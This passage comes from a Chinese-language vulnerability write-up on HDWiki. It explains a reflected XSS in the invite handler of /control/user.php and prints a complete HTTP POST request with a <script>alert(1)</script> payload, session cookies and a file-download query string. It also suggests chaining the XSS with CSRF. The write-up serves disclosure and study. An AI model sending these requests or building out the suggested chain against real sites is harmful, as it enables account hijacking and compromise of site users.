成功任意文件下载。
0x08 前台POST反射型XSS在/control/user.php文件的doinvite方法。
如图:
我们必须想办法让$error置为true,才可以进入到下面分配的分支。
所以这里我们不要被preg_match("/^[w-.]+@[w-.]+(.w+)+$/", $mail)所匹配得到才行,进入到757-758行的分支,ps直接输出到前台模板中没有任何XSS过滤,产生反射XSS漏洞。构造HTTP请求:
POST /index.php?user-invite HTTP/1.1
Host: hdwiki.com
Content-Length: 84
Cache-Control: max-age=0
Origin:
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: PHPSESSID=vpshfq0gnjkf2ko4qdeoaqcjp5; hd_sid=ESCfTk; hd_auth=993bRToK8dVihewqdijd2tsF5fc%2Bcc%2BW8%2FRFsM2MTMtfM%2FJflKkLfGvB2FkvbPl7JhocdUIHk%2B%2F7YqGs5Y9w; hd_querystring=admin_db-downloadfile-%2A%2A%2F%2A%2A%2Frobots%2Atxt
Connection: close
toemails=1&ps=<script>alert(1);</script>&submit=%E5%8F%91%E9%80%81%E9%82%80%E8%AF%B7
这种POST类型的反射型XSS,可以搭配CSRF打组合拳。